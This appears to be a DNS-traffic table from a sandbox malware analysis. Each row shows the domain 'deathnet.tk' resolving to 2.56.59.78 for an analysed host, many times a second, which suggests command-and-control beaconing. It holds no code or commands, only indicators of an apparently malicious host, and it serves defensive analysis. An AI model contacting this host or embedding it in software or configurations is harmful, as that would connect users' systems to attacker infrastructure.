              Mar 21, 2022 20:08:03.063349009 CET8.8.8.8192.168.2.230x778bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.106303930 CET8.8.8.8192.168.2.230xf5b3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.151921034 CET8.8.8.8192.168.2.230xf812No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.195677996 CET8.8.8.8192.168.2.230x333bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.241461992 CET8.8.8.8192.168.2.230x9f20No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.287012100 CET8.8.8.8192.168.2.230x1209No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.331545115 CET8.8.8.8192.168.2.230x4893No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.374804974 CET8.8.8.8192.168.2.230x24c1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.420077085 CET8.8.8.8192.168.2.230x3ef2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.464564085 CET8.8.8.8192.168.2.230xdd01No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.508268118 CET8.8.8.8192.168.2.230xa9f9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.553347111 CET8.8.8.8192.168.2.230x5de3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.599076986 CET8.8.8.8192.168.2.230x6561No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.643100023 CET8.8.8.8192.168.2.230x297bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.686125994 CET8.8.8.8192.168.2.230x632cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.731364012 CET8.8.8.8192.168.2.230x636cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.778240919 CET8.8.8.8192.168.2.230x44b6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.823704958 CET8.8.8.8192.168.2.230x17c5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.868345976 CET8.8.8.8192.168.2.230xdae0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.914364100 CET8.8.8.8192.168.2.230x1ec4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.958976030 CET8.8.8.8192.168.2.230x2bb4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.006633997 CET8.8.8.8192.168.2.230x6106No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.049695015 CET8.8.8.8192.168.2.230x6dadNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.093648911 CET8.8.8.8192.168.2.230x6bfcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.139100075 CET8.8.8.8192.168.2.230x5e14No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.185547113 CET8.8.8.8192.168.2.230x7e46No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.230703115 CET8.8.8.8192.168.2.230x5c76No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.276395082 CET8.8.8.8192.168.2.230xb137No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.322045088 CET8.8.8.8192.168.2.230xe0e9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.367110014 CET8.8.8.8192.168.2.230x1633No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.414113998 CET8.8.8.8192.168.2.230xd532No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.461884022 CET8.8.8.8192.168.2.230x58ceNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.505580902 CET8.8.8.8192.168.2.230xdff0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.553075075 CET8.8.8.8192.168.2.230xca72No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.602489948 CET8.8.8.8192.168.2.230xd021No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.651559114 CET8.8.8.8192.168.2.230x676cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.699580908 CET8.8.8.8192.168.2.230xdf2cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.745126963 CET8.8.8.8192.168.2.230xaf23No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.789438963 CET8.8.8.8192.168.2.230xd7bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.838941097 CET8.8.8.8192.168.2.230xc6d5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.884213924 CET8.8.8.8192.168.2.230x14a6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.927901030 CET8.8.8.8192.168.2.230x9719No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.978585005 CET8.8.8.8192.168.2.230x30efNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.026631117 CET8.8.8.8192.168.2.230x722fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.082549095 CET8.8.8.8192.168.2.230x7be2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.134246111 CET8.8.8.8192.168.2.230x549cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.189374924 CET8.8.8.8192.168.2.230xb62aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.235183954 CET8.8.8.8192.168.2.230xe6ebNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.287130117 CET8.8.8.8192.168.2.230x92bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.335549116 CET8.8.8.8192.168.2.230xe98No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.380434036 CET8.8.8.8192.168.2.230x287dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.424099922 CET8.8.8.8192.168.2.230x6e33No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.468956947 CET8.8.8.8192.168.2.230x6242No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.511789083 CET8.8.8.8192.168.2.230x34bdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.557099104 CET8.8.8.8192.168.2.230xcd1bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.601816893 CET8.8.8.8192.168.2.230x178fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.647456884 CET8.8.8.8192.168.2.230x839eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.691874027 CET8.8.8.8192.168.2.230x9002No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.736485958 CET8.8.8.8192.168.2.230x9aaeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.780349016 CET8.8.8.8192.168.2.230x183bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.825308084 CET8.8.8.8192.168.2.230x72abNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.871066093 CET8.8.8.8192.168.2.230x770aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.916066885 CET8.8.8.8192.168.2.230x7bbdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.965918064 CET8.8.8.8192.168.2.230xee44No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.011014938 CET8.8.8.8192.168.2.230x88e6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.056505919 CET8.8.8.8192.168.2.230x4c85No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.101367950 CET8.8.8.8192.168.2.230xf042No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.147551060 CET8.8.8.8192.168.2.230x509cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.196271896 CET8.8.8.8192.168.2.230xb4e5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.239187002 CET8.8.8.8192.168.2.230x1573No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.284604073 CET8.8.8.8192.168.2.230xa069No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.329324961 CET8.8.8.8192.168.2.230xedcbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.375593901 CET8.8.8.8192.168.2.230xd2dfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.418395996 CET8.8.8.8192.168.2.230xbc3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.467418909 CET8.8.8.8192.168.2.230x74fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.512490988 CET8.8.8.8192.168.2.230xda68No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.556013107 CET8.8.8.8192.168.2.230x99eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.599641085 CET8.8.8.8192.168.2.230x4566No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.646434069 CET8.8.8.8192.168.2.230x2f67No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.691716909 CET8.8.8.8192.168.2.230x3a52No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.738841057 CET8.8.8.8192.168.2.230x57caNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.787379980 CET8.8.8.8192.168.2.230xaabaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.830436945 CET8.8.8.8192.168.2.230x4156No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.876135111 CET8.8.8.8192.168.2.230xbe05No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.920948982 CET8.8.8.8192.168.2.230xd9bdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.963999033 CET8.8.8.8192.168.2.230x58e0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.007185936 CET8.8.8.8192.168.2.230xe8d7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.052012920 CET8.8.8.8192.168.2.230xbb48No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.099423885 CET8.8.8.8192.168.2.230x421cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.146789074 CET8.8.8.8192.168.2.230xd7cdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.194385052 CET8.8.8.8192.168.2.230x8f83No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.239135981 CET8.8.8.8192.168.2.230xce5dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.284563065 CET8.8.8.8192.168.2.230x5284No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.331526041 CET8.8.8.8192.168.2.230x2b8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.379383087 CET8.8.8.8192.168.2.230x961No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.423640013 CET8.8.8.8192.168.2.230x8cfcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.466332912 CET8.8.8.8192.168.2.230x907dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.511173010 CET8.8.8.8192.168.2.230xb529No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.554517031 CET8.8.8.8192.168.2.230x7b5bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.597893953 CET8.8.8.8192.168.2.230x70caNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.643812895 CET8.8.8.8192.168.2.230xa4f3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.696041107 CET8.8.8.8192.168.2.230x86caNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.740930080 CET8.8.8.8192.168.2.230x9086No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.783937931 CET8.8.8.8192.168.2.230xdf7aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.828793049 CET8.8.8.8192.168.2.230xe59bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.874001026 CET8.8.8.8192.168.2.230xc8ccNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.923794985 CET8.8.8.8192.168.2.230xcd0bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.972829103 CET8.8.8.8192.168.2.230x7ccbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.024177074 CET8.8.8.8192.168.2.230x6bfbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.069118023 CET8.8.8.8192.168.2.230x87f8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.115489960 CET8.8.8.8192.168.2.230x9896No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.160526037 CET8.8.8.8192.168.2.230x1c62No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.203826904 CET8.8.8.8192.168.2.230x82b4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.251965046 CET8.8.8.8192.168.2.230x84feNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.297674894 CET8.8.8.8192.168.2.230x424fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.342077017 CET8.8.8.8192.168.2.230x6307No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.393060923 CET8.8.8.8192.168.2.230xb332No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.438401937 CET8.8.8.8192.168.2.230xdfb5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.483603001 CET8.8.8.8192.168.2.230xffbeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.527852058 CET8.8.8.8192.168.2.230xf54No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.572689056 CET8.8.8.8192.168.2.230xcc0dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.617435932 CET8.8.8.8192.168.2.230xbb05No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.662290096 CET8.8.8.8192.168.2.230x38d2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.707684994 CET8.8.8.8192.168.2.230x8a15No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.752291918 CET8.8.8.8192.168.2.230x7575No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.802544117 CET8.8.8.8192.168.2.230xd530No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.850070000 CET8.8.8.8192.168.2.230x19aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.896364927 CET8.8.8.8192.168.2.230xc012No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.943185091 CET8.8.8.8192.168.2.230x980No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.989167929 CET8.8.8.8192.168.2.230x7906No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.033014059 CET8.8.8.8192.168.2.230x8dc0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.076405048 CET8.8.8.8192.168.2.230xb4e9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.120517969 CET8.8.8.8192.168.2.230x8a73No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.163579941 CET8.8.8.8192.168.2.230x50f1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.208544970 CET8.8.8.8192.168.2.230xdf30No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.255083084 CET8.8.8.8192.168.2.230xa742No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.301350117 CET8.8.8.8192.168.2.230x4ef3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.346406937 CET8.8.8.8192.168.2.230x36d4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.391558886 CET8.8.8.8192.168.2.230xac93No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.435276031 CET8.8.8.8192.168.2.230x9123No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.481827021 CET8.8.8.8192.168.2.230x8587No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.527779102 CET8.8.8.8192.168.2.230x74e9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.576510906 CET8.8.8.8192.168.2.230x9bcfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.625313044 CET8.8.8.8192.168.2.230x112eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.671170950 CET8.8.8.8192.168.2.230x3462No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.716509104 CET8.8.8.8192.168.2.230xad99No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.762342930 CET8.8.8.8192.168.2.230x7b2dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.806874037 CET8.8.8.8192.168.2.230xe373No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.852221012 CET8.8.8.8192.168.2.230x62d9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.896106958 CET8.8.8.8192.168.2.230xdc17No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.941806078 CET8.8.8.8192.168.2.230x7c82No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.986609936 CET8.8.8.8192.168.2.230x4d09No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:10.031264067 CET8.8.8.8192.168.2.230x1247No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:10.075702906 CET8.8.8.8192.168.2.230x1499No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:10.121906042 CET8.8.8.8192.168.2.230xcabbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:10.170608997 CET8.8.8.8192.168.2.230x2724No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:10.216890097 CET8.8.8.8192.168.2.230xf347No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:10.263420105 CET8.8.8.8192.168.2.230x7abdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.312973976 CET8.8.8.8192.168.2.230xc4d6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.356669903 CET8.8.8.8192.168.2.230x66caNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.399799109 CET8.8.8.8192.168.2.230xe881No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.443861008 CET8.8.8.8192.168.2.230xb779No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.489018917 CET8.8.8.8192.168.2.230xfadcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.534965038 CET8.8.8.8192.168.2.230x3163No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.581094027 CET8.8.8.8192.168.2.230x822fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.626250029 CET8.8.8.8192.168.2.230x2a2bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.672677994 CET8.8.8.8192.168.2.230x239No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.716178894 CET8.8.8.8192.168.2.230x7f8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.758980989 CET8.8.8.8192.168.2.230x6975No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.804600954 CET8.8.8.8192.168.2.230xe715No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.849942923 CET8.8.8.8192.168.2.230x6718No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.898204088 CET8.8.8.8192.168.2.230x82d7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.943584919 CET8.8.8.8192.168.2.230x242No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.989106894 CET8.8.8.8192.168.2.230x1802No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.034326077 CET8.8.8.8192.168.2.230xc250No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.077827930 CET8.8.8.8192.168.2.230xf7e6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.126200914 CET8.8.8.8192.168.2.230x94b0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.172319889 CET8.8.8.8192.168.2.230x7d5dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.217895985 CET8.8.8.8192.168.2.230xe0ecNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.260710955 CET8.8.8.8192.168.2.230x6fbeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.303229094 CET8.8.8.8192.168.2.230xa4deNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.347157955 CET8.8.8.8192.168.2.230x39c2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.393419981 CET8.8.8.8192.168.2.230x915cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.442224026 CET8.8.8.8192.168.2.230x525No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.488383055 CET8.8.8.8192.168.2.230x2049No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.533936024 CET8.8.8.8192.168.2.230xa2ccNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.577439070 CET8.8.8.8192.168.2.230x12f6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.623266935 CET8.8.8.8192.168.2.230xbf9cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.668560982 CET8.8.8.8192.168.2.230x6fdaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.713279963 CET8.8.8.8192.168.2.230x165eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.758395910 CET8.8.8.8192.168.2.230x603dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.804131985 CET8.8.8.8192.168.2.230x6d98No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.855747938 CET8.8.8.8192.168.2.230x9bb2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.902314901 CET8.8.8.8192.168.2.230xa41aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.947146893 CET8.8.8.8192.168.2.230x7150No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.992486000 CET8.8.8.8192.168.2.230x8255No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.037326097 CET8.8.8.8192.168.2.230xb5d6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.084206104 CET8.8.8.8192.168.2.230x1fa1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.129108906 CET8.8.8.8192.168.2.230x8a2cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
